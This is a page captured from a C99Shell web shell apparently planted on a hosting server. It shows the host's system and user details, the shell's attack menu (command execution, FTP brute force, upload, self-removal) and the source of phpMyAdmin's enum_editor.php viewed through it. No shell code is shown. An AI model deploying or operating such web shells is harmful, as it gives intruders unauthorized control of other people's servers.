!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/usr/share/phpmyadmin/   drwxr-xr-x
Free 1.49 GB of 7.22 GB (20.59%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     enum_editor.php (3.42 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Displays a form for editing ENUM and SET values with more space (as an alternative to doing it in tbl_alter.php)
 * This form is only for users with JavaScript disabled -- users with JavaScript enabled will see a different form
 * defined in tbl_properties.inc.php
 * @package phpMyAdmin
 */

require_once './libraries/common.inc.php';
require_once 
'./libraries/header_http.inc.php';
require_once 
'./libraries/header_meta_style.inc.php';
?>

</head>

<body>
    <form action="enum_editor.php" method="get">
        <div id="enum_editor_no_js">
            <h3><?php printf(__('Values for the column "%s"'), htmlspecialchars($_GET['field'])); ?></h3>
            <p><?php echo __('Enter each value in a separate field.'); ?></p>
            <div id="values">
            <?php
                $values 
= array();
                if (isset(
$_GET['values'])) { // This page was displayed when the "add a new value" link or the link in tbl_alter.php was clicked
                    
$values explode(','urldecode($_GET['values']));
                } elseif (isset(
$_GET['num_fields'])) { // This page was displayed from submitting this form
                    
for($field_num 1$field_num <= $_GET['num_fields']; $field_num++) {
                        
$values[] = "'" str_replace(array("'"'\\'), array("''"'\\\\'), $_GET['field' $field_num]) . "'";
                    }
                }
                
// Display the values in text fields, excluding empty strings
                
$field_counter 0;
                foreach(
$values as $value) {
                    if(
trim($value) != "") {
                        
$field_counter++;
                        echo 
sprintf('<input type="text" size="30" value="%s" name="field' $field_counter '" />'htmlspecialchars(str_replace(array("''"'\\\\'"\\'"), array("'"'\\'"'"), substr($value1, -1))));
                    }
                }

                
$total_fields $field_counter;
                
// If extra empty fields are added, display them
                
if(isset($_GET['extra_fields'])) {
                    
$total_fields += $_GET['extra_fields'];
                    for(
$i $field_counter+1$i <= $total_fields$i++) {
                        echo 
'<input type="text" size="30" name="field' $i '"/>';
                    }
                } else {
                    
$_GET['extra_fields'] = 0;
                }

            
?>
            </div>
            <p>
               <a href="enum_editor.php<?php echo PMA_generate_common_url(array('field' => $_GET['field'], 'extra_fields' => $_GET['extra_fields'] + 1'values' => join(','$values))); ?>">
<?php echo __('+ Restart insertion and add a new value'); ?>
               </a>
            </p>
            <?php echo PMA_generate_common_hidden_inputs(); ?>
             <input type="hidden" name="field" value="<?php echo htmlspecialchars($_GET['field']); ?>" />
             <input type="hidden" name="num_fields" value="<?php echo $total_fields?>" />
             <input type="submit" value="<?php echo __('Go'); ?>" />
        </form>

        <div id="enum_editor_output">
        <h3><?php echo __('Output'); ?></h3>
        <p><?php echo __('Copy and paste the joined values into the "Length/Values" field'); ?></p>
            <textarea id="joined_values" cols="95" rows="5"><?php echo htmlspecialchars(join(","$values)); ?></textarea>
        </div>
    </div>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0305 ]--